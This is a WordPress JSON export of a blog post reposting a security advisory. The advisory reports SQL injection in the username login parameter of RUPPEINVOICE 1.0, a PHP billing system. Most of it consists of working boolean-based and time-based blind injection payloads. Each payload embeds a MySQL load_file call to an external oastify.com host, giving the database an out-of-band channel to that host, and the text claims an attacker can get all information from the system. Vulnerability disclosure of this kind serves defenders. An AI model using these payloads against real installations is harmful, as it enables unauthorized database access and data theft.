{"id":55290,"date":"2024-03-11T18:59:51","date_gmt":"2024-03-11T15:59:51","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/177520\/ruppeinvoice10-sql.txt"},"modified":"2024-03-12T11:01:18","modified_gmt":"2024-03-12T07:31:18","slug":"ruppeinvoice-1-0-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/ruppeinvoice-1-0-sql-injection\/","title":{"rendered":"RUPPEINVOICE 1.0 SQL Injection"},"content":{"rendered":"<p style=\"text-align: left;\">## Title: RUPPEINVOICE-1.0 Multiple-SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 03\/09\/2024<br \/>\n## Vendor: https:\/\/www.mayurik.com\/<br \/>\n## Software: https:\/\/www.sourcecodester.com\/php\/14831\/billing-system-project-php-source-code-free-download.html<br \/>\n## Reference: https:\/\/portswigger.net\/web-security\/sql-injection<\/p>\n<p style=\"text-align: left;\">## Description:<br \/>\nThe username parameter appears to be vulnerable to SQL injection<br \/>\nattacks. The payload &#8216;+(select<br \/>\nload_file(&#8216;\\\\\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\\\fmd&#8217;))+&#8217;<br \/>\nwas submitted in the username parameter. This payload injects a SQL<br \/>\nsub-query that calls MySQL&#8217;s load_file function with a UNC file path<br \/>\nthat references a URL on an external domain. The application<br \/>\ninteracted with that domain, indicating that the injected SQL query<br \/>\nwas executed. The attacker can get all information from the system by<br \/>\nusing this vulnerability!<\/p>\n<p style=\"text-align: left;\">STATUS: HIGH- Vulnerability<\/p>\n<p style=\"text-align: left;\">[+]Payload:<br \/>\n&#8220;`mysql<br \/>\n&#8212;<br \/>\nParameter: username (POST)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind &#8211; WHERE or HAVING clause (NOT)<br \/>\nPayload: username=zBuveHif&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\\\fmd&#8217;))+&#8221;<br \/>\nOR NOT 6356=6356 AND &#8216;Eocq&#8217;=&#8217;Eocq&amp;password=g7J!m3v!W2&amp;login=<\/p>\n<p style=\"text-align: left;\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: username=zBuveHif&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\\\fmd&#8217;))+&#8221;<br \/>\nAND (SELECT 4013 FROM (SELECT(SLEEP(7)))BnHP) AND<br \/>\n&#8216;bCQt&#8217;=&#8217;bCQt&amp;password=g7J!m3v!W2&amp;login=<br \/>\n&#8212;<\/p>\n<p style=\"text-align: left;\">&#8220;`<\/p>\n<p style=\"text-align: left;\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/mayuri_k\/2023\/RUPPEINVOICE-1.0)<\/p>\n<p style=\"text-align: left;\">## Proof and Exploit:<br \/>\n[href](https:\/\/www.nu11secur1ty.com\/2024\/03\/ruppeinvoice-10-multiple-sqli.html)<\/p>\n<p style=\"text-align: left;\">## Time spend:<br \/>\n00:35:00<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: RUPPEINVOICE-1.0 Multiple-SQLi ## Author: nu11secur1ty ## Date: 03\/09\/2024 ## Vendor: https:\/\/www.mayurik.com\/ ## Software: https:\/\/www.sourcecodester.com\/php\/14831\/billing-system-project-php-source-code-free-download.html ## Reference: https:\/\/portswigger.net\/web-security\/sql-injection ## Description: The username parameter appears to be vulnerable to SQL injection attacks. The payload &#8216;+(select load_file(&#8216;\\\\\\\\abpf13cdvni2r5g9hn26os0bd2jv7m0ardf52vqk.oastify.com\\\\fmd&#8217;))+&#8217; was submitted in the username parameter. This payload injects a SQL sub-query that calls MySQL&#8217;s load_file function with a &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55290","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55290","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55290"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55290\/revisions"}],"predecessor-version":[{"id":55302,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55290\/revisions\/55302"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55290"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55290"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55290"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}